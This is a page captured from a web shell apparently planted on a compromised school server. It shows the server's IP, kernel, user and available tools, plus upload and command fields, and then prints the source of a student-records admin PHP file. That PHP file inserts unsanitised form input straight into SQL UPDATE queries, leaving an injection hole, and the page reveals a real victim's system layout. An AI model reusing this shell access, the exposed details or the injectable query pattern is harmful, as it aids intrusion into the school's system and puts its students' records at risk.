403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/gpa/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/gpa/admin/bookp.php
<?php include("../config/confiteacher.inc.php");?>
<?
require_once "../config/connectdb.php";
$user=$objResult[Username];
?>
<?
require_once "head.php";
?>
<?
$sql2="SELECT namesc,years,termx FROM config";
$result2 = mysql_query($sql2);
while (list($namesc,$years,$termx) = mysql_fetch_row($result2)) {
$xsc_Name = $namesc;
$years1  = $years;
$termx1=$termx;
}
?>	
<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=tis-620">

<title>½èÒºÃÔËÒçҹÇÔªÒ¡ÒÃ</title>

</head>

<body>
<?
require_once "../config/connectdb.php";
$year=date(" Y ")+542; 
//*** Update Condition ***//
if($_GET["Action"] == "Save")
{
	for($i=1;$i<=$_POST["hdnLine"];$i++)
	{
		$strSQL = "UPDATE memberregis SET ";
		$strSQL .="statuss = '".$_POST["sst$i"]."'";
		$strSQL .=",unitye = '".$_POST["becab$i"]."'";
		$strSQL .="WHERE id= '".$_POST["hdnid$i"]."' ";
		
		$objQuery = mysql_query($strSQL);
	}

	echo "ÃÍÊÑ¡¤ÃÙ .";
	echo "<script>window.alert(\"ºÑ¹·Ö¡¢éÍÁÙÅàÃÕºáÅéǤÃѺ\");history.go (-1);</script>";
	//header("location:$_SERVER[PHP_SELF]");
	//exit();
}

$sql2="SELECT years FROM config";
$result2 = mysql_query($sql2);
while (list($years) = mysql_fetch_row($result2)) {
$xsc_years = $years;
$strSQL = "select * from  memberregis
where statuss='1' order by id asc";
$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");
$i = 1;

}



				
?>




<table width="773" border="0" align="center" cellpadding="0" cellspacing="0">
                
              
<form name="frmMain" method="post" action="bookp.php?Action=Save">
<table  width="100%" border="0" bgcolor="#999999">
 <a href=../main.php>˹éÒËÅÑ¡ </a>&nbsp;&nbsp;<a href=book.php>¡ÅѺ</a><center>&nbsp;&nbsp;<a href=printsucp.php>ºØ¤¤Å·ÑèÇä»·Õè¾ÔÁ¾ìáÅéÇ</a></center>
  
  <tr bgcolor="#FFFFFF"><center></center>
    <th width="10"> <div align="center"></div></th>
	 <th width="10"> <div align="center">#</div></th>
    <th width="10"> <div align="center">ÃËÑʹѡàÃÕ¹</div></th>
	 <th width="100"> <div align="center">ª×èÍ-Ê¡ØÅ</div></th>
	 <th width="100"> <div align="center">ª×èÍ-Ê¡ØÅ</div></th>
	 <th width="100"> <div align="center">àÍ¡ÊÒÃ</div></th>
	 <th width="100"> <div align="center">»Õ·Õ診</div></th>
    <th width="10"> <div align="center">Çѹ·ÕèÂ×è¹</div></th>
	
	<th width="10"> <div align="center">ËÁÒÂà˵Ø</div></th>
	<th width="100"> <div align="center">ʶҹÐ</div></th>
	<th width="100"> <div align="center">â·Ã</div></th>
  </tr>
<?
$i =0;

while($objResult = mysql_fetch_array($objQuery))

{
if($bg == "#EEEEEE") { //Êèǹ¢Í§¡Òà ÊÅѺÊÕ 
$bg = "#FFFFFF";
} else {
$bg = "#EEEEEE";
}

	$i = $i + 1;
	$codin =$objResult["id"];
	$sst=$objResult['statuss'];
	$name=$objResult['name'];
	$timeb=$objResult['signup'];
	$pin=$objResult['pin'];
	$becab=$objResult['unitye'];
	$signup=$objResult['signup'];
	$schooloutyear=$objResult['schooloutyear'];
	$report=$objResult['report1'];
?>

<?
				$crsql="SELECT reportt FROM `booktyp`
				WHERE bookt = '$tyb'" ;
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$bbtyp=$dcrd[0];


				$crsql="SELECT pp1 FROM `memberregis`
				WHERE pin = '$pin'" ;
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$pp1=$dcrd[0];


				$crsql="SELECT pp2 FROM `memberregis`
				WHERE pin = '$pin'" ;
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$pp2=$dcrd[0];



				$crsql="SELECT pp1e FROM `memberregis`
				WHERE pin = '$pin'" ;
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$pp1e=$dcrd[0];


				$crsql="SELECT pp2e FROM `memberregis`
				WHERE pin = '$pin'" ;
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$pp2e=$dcrd[0];
									



									


									?>

  <tr bgcolor="<?=$bg?>">
    <td><div align="center">
	<input type="hidden" name="hdnid<?=$i;?>" size="5" value="<?=$objResult["id"];?>">
	 <td><?=$i?></td>
	<td><div align="right"><?=$objResult["idtest"];?>
	</div></td>
	</div></td>
   
<td><?=$objResult["prefix"];?><?=$objResult["name"];?>&nbsp;&nbsp;<?=$objResult["surname"];?>&nbsp;&nbsp;</td>

<td><?=$objResult["surnamee"];?></td>
	<td> 
	
	
	<? if($pp1==1)
 {
   echo "»¾.1 Á.µé¹";
 }
 else if($pp1==2)
	 {
   echo "»¾.1 Á.»ÅÒÂ";
 }
 else if($pp1==0)
 {
   echo '<span style="color: red;" /></span>';
   }
?>
	&nbsp;&nbsp;
	<? if($pp2==3)
 {
   echo "»¾.2 Á.µé¹";
 }
 else if($pp2==4)
	 {
   echo "»¾.2 Á.»ÅÒÂ";
 }
 else if($pp2==0)
 {
   echo '<span style="color: red;" /></span>';
   }
?>
	
&nbsp;&nbsp;
	<? if($pp1e==5)
 {
   echo "»¾.1 E Á.µé¹";
 }
 else if($pp1e==6)
	 {
   echo "»¾.1 E Á.»ÅÒÂ";
 }
 else if($pp1e==0)
 {
   echo '<span style="color: red;" /></span>';
   }
?>
	&nbsp;&nbsp;
	<? if($pp2e==7)
 {
   echo "»¾.2 E Á.µé¹";
 }
 else if($pp2e==8)
	 {
   echo "»¾.2 E Á.»ÅÒÂ";
 }
 else if($pp2e==0)
 {
   echo '<span style="color: red;" /></span>';
   }
?></div></td>
	
    <td><div align="right"><? echo "$schooloutyear"; ?></div></td>
	<td><div align="right"><? echo "$timeb"; ?></div></td>

	
                                        

	
    
	
	
   
	<td style="width:110px;">
	
	

	<input type="text" name="becab<?=$i;?>" size="50" maxlength="100" value="<?=$objResult["unitye"];?>">
	
	<? echo "$report"; ?>
	
	
	
	
	
	
	
	</td>
	<td><input type="radio" name="sst<?=$i;?>" value="1" <? if($sst=="1"){ echo "checked"; }?>>儤

<input type="radio" name="sst<?=$i;?>" value="2" <? if($sst>1){ echo "checked"; }?>>¾ÔÁ¾ì</td>
	<td>
	<?=$objResult["phone"];?>
	</td>
	
	





  </tr>
<?
	  $i = $i;
  }
  ?>
</table>
  <input type="submit" name="submit" value="Â×¹Âѹ!/ºÑ¹·Ö¡">
  <input type="hidden" name="hdnLine" value="<?=$i;?>">
</form>
<?
?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit